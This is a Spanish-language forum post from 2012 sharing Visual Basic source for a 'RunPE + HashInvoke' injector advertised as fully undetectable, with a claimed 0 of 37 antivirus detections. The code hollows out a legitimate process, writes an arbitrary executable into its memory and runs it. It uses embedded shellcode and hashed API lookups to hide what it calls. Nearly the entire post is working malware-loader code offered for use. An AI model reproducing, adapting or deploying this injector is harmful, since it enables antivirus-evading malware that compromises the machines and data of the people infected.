RunPe + HashInvoke FUD
Publicado: 03 Jun 2012, 15:08
Buenas Tios , nadie raro , solo ay canbiado los parametros a Hash
Espero gustem , saludos
Espero gustem , saludos
Código: Seleccionar todo
' ===========================================================================================================================
' ===========================================================================================================================
' => Autor: M3
' => RunPe + HashInvoke FUD baseado en el JunPE de Jhonjhon_123
' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
' => Detecciones : 0 | 37 (http://scanner.udtools.net/reporte.php?id=vmnm_dyBj)
' => Flecha : 03|06|2012
' => sHost : Ruta al exe
' => sBytes: Bytes a ejecutar
' ===========================================================================================================================
' ===========================================================================================================================
Declare Function CallWindowProcA Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
Private sVALUE As Byte
Private sMEMORY(40) As Byte
Private ASM_GETAPIPTR(170) As Byte
Private ASM_CALLCODE(255) As Byte
Private IMAGE_DOS_HEADER(65) As Byte
Private IMAGE_NT_HEADERS(256) As Byte
Private IMAGE_SECTION_HEADER(60) As Byte
Private PROCESS_INFORMATION(44) As Byte
Private tCONTEXT(210) As Byte
Private STARTUPINFO(16) As Long
Private sParams As Long
Private sImageBase As Long
Private sProcess As Long
Private sThread As Long
Private SizeOfImage As Long
Private SizeOfHeaders As Long
Private sEntryPoint As Long
Private sVirtualAddress As Long
Private sRawData As Long
Private sRawDataPoint As Long
Private sEbx As Long
Private D As Long
Private Y As Long
Private vItem As Variant
Private sSection As Integer
Private Type DWORD_L
D1 As Long
End Type
Private Type DWORD_B
B1 As Byte
B2 As Byte
B3 As Byte
B4 As Byte
End Type
Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)
For Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, _
&H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, _
&HC2, &H10, &H0, &H10)
sMEMORY(Y) = vItem
Y = Y + 1
sVALUE = 200 + 48
Next
Call MoveMemory(Varptr(STARTUPINFO(0)), Varptr(72), CLng("0"))
Call MoveMemory(Varptr(tCONTEXT(CLng("0"))), Varptr(&H10007), &H1 + &H4 + &H3)
Call MoveMemory(Varptr(IMAGE_DOS_HEADER(CLng("0"))), Varptr(sBytes(CLng("0"))), 72)
Call MoveMemory(Varptr(sParams), Varptr(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
Call MoveMemory(Varptr(IMAGE_NT_HEADERS(CLng("0"))), Varptr(sBytes(sParams)), 256)
Call MoveMemory(Varptr(sImageBase), Varptr(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
Call MoveMemory(Varptr(SizeOfImage), Varptr(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)
Call MoveMemory(Varptr(SizeOfHeaders), Varptr(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)
Call MoveMemory(Varptr(sEntryPoint), Varptr(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
Call MoveMemory(Varptr(sSection), Varptr(IMAGE_NT_HEADERS(6)), &H2)
Call sHashInv("KERNEL32", &H16B3FE88, 0, StrPtr(sHost), 0, 0, &H1, &H4, 0, 0, Varptr(STARTUPINFO(CLng("0"))), Varptr(PROCESS_INFORMATION(CLng("0"))))
Call MoveMemory(Varptr(sProcess), Varptr(PROCESS_INFORMATION(CLng("0"))), &H1 + &H3)
Call MoveMemory(Varptr(sThread), Varptr(PROCESS_INFORMATION(4)), &H1 + &H3)
Call sHashInv("NTDLL", &HF21037D0, sProcess, sImageBase)
Call sHashInv("KERNEL32", &H6E1A959C, sProcess, sImageBase, SizeOfImage, &H3000&, &H40)
Call sHashInv("NTDLL", &HC5108CC2, sProcess, sImageBase, Varptr(sBytes(CLng("0"))), SizeOfHeaders, CLng("0"))
For D = 0 To sSection - 1
Call MoveMemory(Varptr(IMAGE_SECTION_HEADER(CLng("0"))), Varptr(sBytes(sParams + sVALUE + 40 * D)), &H40)
Call MoveMemory(Varptr(sVirtualAddress), Varptr(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
Call MoveMemory(Varptr(sRawDataPoint), Varptr(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)
Call MoveMemory(Varptr(sRawData), Varptr(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
Call sHashInv("NTDLL", &HC5108CC2, sProcess, sImageBase + sVirtualAddress, Varptr(sBytes(sRawData)), sRawDataPoint, CLng("0"))
Next
Call sHashInv("NTDLL", &HE935E393, sThread, Varptr(tCONTEXT(CLng("0"))))
Call sHashInv("NTDLL", &HC5108CC2, sProcess, sEbx + &H4 + &H1 + &H3, Varptr(sVirtualAddress), &H1 + &H3 + &H2, CLng("0"))
Call MoveMemory(Varptr(tCONTEXT(176)), Varptr(sImageBase + sEntryPoint), &H1 + &H3)
Call MoveMemory(Varptr(sEntryPoint), Varptr(tCONTEXT(176)), &H1 + &H3)
Call sHashInv("NTDLL", &H6935E395, sThread, Varptr(tCONTEXT(CLng("0"))))
Call sHashInv("NTDLL", &HC54A46C8, sThread, CLng("0"))
End Function
Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
Call sHashInv("USER32", &HC8358393, Varptr(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0"))
End Sub
Function sHashInv(ByVal sDll As String, ByVal sHashCode As Long, ParamArray sParams() As Variant) As Long
Dim vItem As Variant
Dim i As Long
Dim W As Long
Dim sAsmPtr(0 To 170) As Byte
Dim sAsmCode(0 To 255) As Byte
For Each vItem In Array _
_
_
(&HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, _
&HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, _
&HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, _
&H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, _
&H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, &H53, &H56, &H57, &H8B, &H6C, _
&H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, _
&H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, _
&H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, _
&HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, _
&HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, _
&H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3)
sAsmPtr(i) = vItem: i = i + 1
Next vItem: i = 0
For W = UBound(sParams) To LBound(sParams) Step -1
sAsmCode(i) = "&H" & "68"
i = i + 1
sAsmCode(i) = sLong(sParams(W)).B1
i = i + 1
sAsmCode(i) = sLong(sParams(W)).B2
i = i + 1
sAsmCode(i) = sLong(sParams(W)).B3
i = i + 1
sAsmCode(i) = sLong(sParams(W)).B4
i = i + 1
Next W
sAsmCode(i) = "&H" & "B8"
i = i + 1
sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B1
i = i + 1: _
sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B2
i = i + 1: _
sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B3
i = i + 1: _
sAsmCode(i) = sLong(CallWindowProcA(Varptr(sAsmPtr(0)), StrPtr(sDll), sHashCode)).B4
i = i + 1: _
sAsmCode(i) = "&H" & "FF": i = i + 1: sAsmCode(i) = "&H" & "D0"
i = i + 1: _
sAsmCode(i) = "&H" & "C3"
i = i + 1: _
sHashInv = CallWindowProcA(Varptr(sAsmCode(0)))
End Function
Private Function sLong(ByVal lLong As Long) As DWORD_B
Dim tL As DWORD_L
tL.D1 = lLong: LSet sLong = tL
End Function